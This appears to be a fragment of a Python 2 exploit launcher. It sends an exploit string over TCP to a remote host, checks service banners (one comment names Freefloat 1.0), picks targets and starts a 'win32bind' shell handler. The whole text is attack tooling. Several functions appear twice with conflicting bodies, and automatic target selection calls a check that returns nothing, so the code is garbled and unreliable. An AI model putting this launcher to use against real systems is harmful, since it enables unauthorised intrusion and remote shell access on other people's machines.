def run(HOST, PORT, TARGET, PAYLOAD, PARGS):
SPLOITSTRING = makeSploit(TARGET, PAYLOAD, PARGS)
SUCCESS = exploitutils.tcpexploit(HOST, PORT, SPLOITSTRING)
if SUCCESS != True:
exploitutils.print_bad("Exploit failed!")
sys.exit()
sys.stdout.write(" Waiting for exploit to finish")
sys.stdout.flush()
time.sleep(1)
sys.stdout.write(" 4")
sys.stdout.flush()
time.sleep(1)
sys.stdout.write(" 3")
sys.stdout.flush()
time.sleep(1)
sys.stdout.write(" 2")
sys.stdout.flush()
time.sleep(1)
sys.stdout.write(" 1")
sys.stdout.flush()
time.sleep(1)
sys.stdout.write("\r")
sys.stdout.flush()
sys.stdout.write(" ")
sys.stdout.write("\r")
exploitutils.handler(HOST, PAYLOAD)
def run(HOST, PORT, TARGET, PAYLOAD, ARGS):
SPLOITSTRING = makeSploit(TARGET, PAYLOAD, ARGS)
SUCCESS = exploitutils.tcpexploit(HOST, PORT, SPLOITSTRING)
if SUCCESS != True:
exploitutils.print_bad("Exploit failed!")
sys.exit()
exploitutils.handler(HOST, PAYLOAD)
def checkVulnerability(HOST, PORT):
# Check banner for Freefloat 1.0
response = exploitutils.bannercheck(HOST, PORT)
for BANNER in response:
exploitutils.print_good("Target appears exploitable")
return
exploitutils.print_bad("Target is not vulnerable")
sys.exit()
def main():
parser = exploitutils.arguments()
args = parser.parse_args()
if args.PORT:
PORT = int(args.PORT)
else:
PORT = int(143)
if args.PAYLOAD:
PAYLOAD = str(args.PAYLOAD)
else:
PAYLOAD = 'win32bind'
if args.PARGS:
ARGS = args.PARGS
else:
ARGS = ''
if args.targets:
print " Exploit targets available:"
print " ========================="
for i in TARGETS:
print " " + str(i) + " | " + TARGETS[i][0]
sys.exit()
if args.RHOST:
HOST = str(args.RHOST)
else:
parser.print_help()
sys.exit()
if args.check:
checkVulnerability(HOST, PORT)
sys.exit()
if args.TARGET:
TARGET = TARGETS[int(args.TARGET)][1]
else:
exploitutils.print_status("Automatic target selection")
TARGET = checkVulnerability(HOST, PORT)
if args.force:
if not args.TARGET:
exploitutils.print_bad("Set a target before launching exploit")
sys.exit()
run(HOST, PORT, TARGET, PAYLOAD, ARGS)
sys.exit()
run(HOST, PORT, TARGET, PAYLOAD, ARGS)
def checkVulnerability(HOST, PORT):
# Check banner
response = exploitutils.bannercheck(HOST, PORT)
if response == False:
exploitutils.print_bad("Exploit failed!")
sys.exit()
for i in TARGETS:
if TARGETS[i][0] in response:
#print " Received %s" % response
exploitutils.print_good("Target appears exploitable")
return TARGETS[i][1]
exploitutils.print_bad("Target is not vulnerable")
sys.exit()